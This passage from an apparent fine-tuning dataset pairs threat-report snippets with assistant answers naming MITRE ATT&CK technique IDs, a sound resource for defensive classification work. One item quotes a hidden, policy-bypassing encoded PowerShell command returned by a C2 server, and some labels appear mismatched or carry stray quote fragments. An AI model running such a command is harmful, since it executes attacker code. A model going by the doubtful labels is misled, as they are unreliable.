\"ID# - Technique\". " }, { "role": "user", "content": "Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperStack can use default credentials to connect to IPC$ shares on remote machines." }, { "role": "assistant", "content": "T1078.001 - Valid Accounts: Default Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoJax has modified the Registry key \"‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute’\" from \"‘autocheck autochk *’\" to \"‘autocheck autoche *’\" in order to execute its payload during Windows startup." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can deobfuscate its payload prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker terminates various services related to system security and Windows." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry utilizes \"wmic\" to delete shadow copies." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account." }, { "role": "assistant", "content": "T1114.003 - Email Collection: Email Forwarding Rule" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware — threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 downloaded and launched code within a SCT file." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The wrapper JAR file drops a secondary JAR file and copies it to a %Temp% location. The payload JAR file can be extracted using AES decryption. The first 16 bytes in the file “k” seen in Figure 4 contains the key and the file “e” is the encrypted Java payload" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:powershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQQBHAGsAQQBiAGcAQgAwAEEARQAwAEEAWQBRAEIAdQBBAEcARQBBAFoAdwBCAGwAQQBIAEkAQQBYAFEAQQA2AEEARABvAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBRAHcAQgBsAEEASABJAEEAZABBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEARgBZAEEAWQBRAEIAcwBBAEcAawBBAFoAQQBCAGgAQQBIAF..snip..As you can see, the C2 server responds with a PowerShell command that will run on the system" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream has the ability to discover application windows via execution of `EnumWindows`." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used a malware variant called WIDETONE to conduct port scans on the specified subnets." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Spalax, the threat actors obtained packers such as CyaX." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Thrip used a cloud-based remote access software called LogMeIn for their attacks." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RogueRobin gathers the IP address and domain from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can download files to specified targets." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "will attempt to detect if the infected host is configured to a proxy. If so, will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use to establish an RDP connection with a controller over TCP/7519." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has deleted itself and associated artifacts from victim machines." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used scheduled tasks to persist on victim systems." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "deletes data in a way that makes it unrecoverable." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Obfuscation Mechanism for the JScript Code The malicious JScript code obfuscation relies on two main techniques" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key." }, { "role": "assistant", "content": "T1606.001 - Web Cookies" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury can automatically exfiltrate gathered SSH credentials." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The bot shows a number of similarities to Dyre but appears to have been rewritten. This assumption is made based on old Dyre code, which would primarily use built-in functions for doing things such as AES and SHA256 hashing. In the recent samples identifying themselves as TrickBot, the code appears to be based on that old code but rewritten to use things such as Microsoft CryptoAPI and COM" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA" }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can recognize the presence of monitoring tools on a target system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe, as well as by adding a new service named OfficeUpdateService." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dyre uses HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ipconfig can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Technique Description Fan Check The Trojan will perform the following WMI query:   Select * from Win32_Fan   According to MSDN, this query should return a class that provides statistics on the CPU fan" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky can delete files it creates from the infected system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpyNote RAT is capable of performing a variety of alarming functions that includes: Activating the device’s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control (C&C) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox’s report on the SpyNote RAT’s signature and detected functions: Figure 1 : Zscaler Cloud Sandbox Detection The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder, which was leaked last year" }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1083 - File and Directory Discovery', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started" }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection" }, { "role": "assistant", "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can determine the time on the victim machine via IPinfo." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list." }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can communicate over multiple C2 host and port combinations." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used process hollowing to inject into child processes." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer has used Process Doppelgänging to evade security software while deploying tools on compromised systems." }, { "role": "assistant", "content": "T1055.013 - Process Doppelgänging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While both malware families are designed to deploy Cobalt Strike Beacon, there are differences in Cobalt Strike configuration. To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol" }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kerrdown has been distributed through malicious e-mail attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sys10 uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories." }, { "role": "assistant", "content": "T1005 - Data from Local System', 'T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBK has the ability to use the \"CreatePipe\" API to add a sub-process for execution via cmd." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems." }, { "role": "assistant", "content": "T1554 - Compromise Host Software Binary" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These files are stored within an 217kb encrypted cab file in the dropper’s resources under the name “A”" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. Below shows the RC4 key \"sV. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender." }, { "role": "assistant", "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As with much of the malware distributed by TA505, The Trick has appeared in frequent, high-volume campaigns. The campaigns used a mix of attached zipped scripts (WSF, VBS), malicious Microsoft Office documents (Word, Excel), HTML attachments, password-protected Microsoft Word documents, links to malicious JavaScript, and other vectors. The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can dump the SAM database." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 5 Uploading a file to server via RGDoor Downloading a file from the server via RGDoor" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can Base64 encode system information sent to C2." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1559.001 - Component Object Model', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used HTTPS for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can XOR encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of performing process listings." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets." }, { "role": "assistant", "content": "T1595.002 - Vulnerability Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell has the ability to create reverse shells with Perl scripts." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes is capable of downloading files, including additional modules." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWizard can use `cmd.exe` for execution on compromised hosts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts)." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or 